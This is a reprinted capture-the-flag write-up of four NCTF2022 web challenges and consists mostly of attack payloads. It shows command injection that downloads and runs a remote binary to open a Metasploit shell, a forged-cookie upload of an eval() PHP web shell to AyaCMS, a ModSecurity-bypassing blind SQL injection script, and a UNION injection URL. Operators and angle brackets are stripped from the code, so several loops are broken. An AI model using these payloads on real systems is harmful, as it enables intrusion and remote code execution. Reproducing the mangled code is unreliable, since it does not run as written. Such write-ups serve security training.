Title: NCTF2022 Web Writeup

1.calc

Question address: http://116.205.139.166:8001/

Right click /source source code

@app.route('/calc',methods=['GET'])

def calc():

ip=request.remote_addr

num=request.values.get('num')

log='echo {0}{1}{2} ./tmp/log.txt'.format(time.strftime('%Y%m%d-%H%M%S',time.localtime()),ip,num)

if waf(num):

try:

data=eval(num)

os.system(log)

except:

pass

return str(data)

else:

return 'waf!'

flask errors can be reported to see the filtering rules of waf

http://162.14.110.241:8050/calc?num[]=

def waf(s):

blacklist=['import','(',')','#','@','^','$',',',''?','`',' ','_','|';','','','{','}','','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']

flag=True

for no in blacklist:

if no.lower() in s.lower():

flag=False

print(no)

break

Return flag

After trying it, I found that I can operate num, use %0a to separate different commands, and %09 instead of spaces

Then note that the statement needs to be executed normally by eval(num), otherwise it will not jump to the os.system(log). The solution is to wrap the command in single quotes.

/calc?num=%0a'curl'%09'gtwq54.dnslog.cn'%0a

Because the backticks are not easy to bring out echoes, I simply use curl to download payload and go online with msf

/calc?num=%0a'curl'%09'http://x.x.x.x:yyyy/testapp'%09'-o'%09'/tmp/testapp'%0a

/calc?num=%0a'chmod'%09'777'%09'/tmp/testapp'%0a

/calc?num=%0a'/tmp/testapp'%0a

2.ez_php

Question address: http://81.70.155.160/

ayacms github address

https://github.com/loadream/AyaCMS

There are many vulnerabilities in issues, but you have to log in to the background/front desk

The background admin.php tried the weak password but failed, and the front desk could not register.

So I downloaded the source code directly for code auditing, and then watched it for most of the day

Many places in the source code have defined('IN_AYA') or exit('Access Denied'); that is, it cannot be accessed directly, and it must be included or required through other php files that have defined IN_AYA constants.

This way of thinking is converted to finding vulnerabilities contained in files

I've been searching for a long time and found a place at /aya/admin.inc.php

The get_cookie gets the cookie value with aya_ prefix, and decrypt can also find the source code of the corresponding encrypt function.

AYA_KEY during encryption is the default value aaa

After the file is included, the idea will be much broader, and then combine it with known vulnerabilities

https://github.com/loadream/AyaCMS/issues/3

payload

?php

function random($length=4,$chars='abcdefghijklmnopqrstuvwxyz'){

$hash='';

$max=strlen($chars)-1;

for($i=0;$i$length;$i++){

$hash.=$chars[mt_rand(0,$max)];

}

return $hash;

}

function kecrypt($txt,$key){

$key=md5($key);

$len=strlen($txt);

$ctr=0;

$str='';

for($i=0;$i$len;$i++){

$ctr=$ctr==32?0:$ctr;

$str.=$txt[$i]^$key[$ctr++];

}

return $str;

}

function encrypt($txt,$key=''){

$key or $key='aaa';

$rnd=random(32);

$len=strlen($txt);

$ctr=0;

$str='';

for($i=0;$i$len;$i++){

$ctr=$ctr==32?0:$ctr;

$str.=$rnd[$ctr].($txt[$i]^$rnd[$ctr++]);

}

return str_replace('=','',base64_encode(kecrypt($str,$key)));

}

echo encrypt('./module/admin/fst_upload');

http package

POST /aya/admin.inc.php HTTP/1.1

Host: 81.70.155.160

Content-Length: 244

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: null

Content-Type: multipart/form-data; boundary=---WebKitFormBoundarykhsd4wQ8UBmzCnD1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.62

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6

Cookie: aya_admin_lang=QWwPIAJ9EitZZEEoQWtYOFA0DCUAMFttV2ANPBUlRmFNKBRmFTEQG1ZxTDFaaVEyQyMWdA

Connection: close

-----WebKitFormBoundarykhsd4wQ8UBmzCnD1

Content-Disposition: form-data; name='upfile'; filename='xzxz123123123.php'

Content-Type: application/octet-stream

?php eval($_REQUEST[1]);phpinfo();

-----WebKitFormBoundarykhsd4wQ8UBmzCnD1

3.ezbypass

hint hint waf is modsecurity

Title address: http://162.14.110.241:8099/sql.php http://121.37.11.207:8099/sql.php

Found a reference article online

https://blog.h3xstream.com/2021/10/bypassing-modsecurity-waf.html

The rest is to use a script to directly follow its payload, because the question prompts Can you find my password? so just guess the content of the password column.

import requests

import time

flag=''

i=1

while True:

min=32

max=127

While min max:

time.sleep(0.08)

mid=(min + max) //2

print(chr(mid))

payload='if(ascii 1.e(substring(1.e(select password from users.info),{},1)){},1,0)'.format(i, mid)

url='http://162.14.110.241:8099/sql.php?id={}'.format(payload)

res=requests.get(url)

if 'letian' in res.text:

min=mid + 1

else:

max=mid

flag +=chr(min)

i +=1

print('found', flag)

4.ez_sql

Question address: http://81.70.155.160:3000/https://nctf.h4ck.fun/static/upload/files/06b43b853452e30514edf6bd709b3f99.zip

The title description gives the source code

app.js

import { Application, Router, helpers } from 'https://deno.land/x/oak/mod.ts';

import Flight from './db.js';

const app=new Application();

const router=new Router();

router.get('/', async(ctx)={

ctx.response.body='check your flight `/flight?id=`';

});

router.get('/flight', async(ctx)={

const id=helpers.getQuery(ctx, { mergeParams: true });

const info=await Flight.select({departure: 'departure', destination: 'destination'}).where(id).all();

ctx.response.body=info;

});

app.use(router.routes());

app.use(router.allowedMethods());

app.listen({ port: 3000, hostname: '0.0.0.0' });

db.js

import { DataTypes, Database, Model, SQLite3Connector} from 'https://deno.land/x/[email protected]/mod.ts';

const connector=new SQLite3Connector({

filepath: '/tmp/flight.db'

});

const db=new Database(connector);

class Flight extends Model {

static table='flight';

static fields={

id: { primaryKey: true, autoIncrement: true },

department: DataTypes.STRING,

destination: DataTypes.STRING,

};

}

class Flag extends Model {

static table='flag';

static fields={

flag: DataTypes.STRING,

};

}

db.link([Flight, Flag]);

await db.sync({ drop: true });

await Flight.create({

department: 'Paris',

destination: 'Tokyo',

});

await Flight.create({

department: 'Las Vegas',

destination: 'Washington',

});

await Flight.create({

department: 'London',

destination: 'San Francisco',

});

await Flag.create({

flag: Deno.env.get('flag'),

});

export default Flight

Almost exactly the same as Hack.lu 2022 foodAPI, the reference article is as follows

https://blog.huli.tw/2022/10/31/hacklu-ctf-2022-writeup/

https://gist.github.com/parrot409/f7f5807478f50376057fba755865bd98

https://gist.github.com/terjanq/1926a1afb420bd98ac7b97031e377436

The only difference is that the original question id uses the restful API form, while this question is get passed on parameters, so you cannot copy it directly exp

However, if you look at the principles analyzed in the article, you will know that the idea is to use parameters to splice SQL statements, so imitate the original payload and pass it in as another get query

http://81.70.155.160:3000/flight?id=1?=a` and 0 union select flag,2 from flag;

Attachment download: https://github.com/X1cT34m/NCTF2022

Reprinted original text: https://exp10it.cn/2022/12/nctf-2022-web-writeup/#calc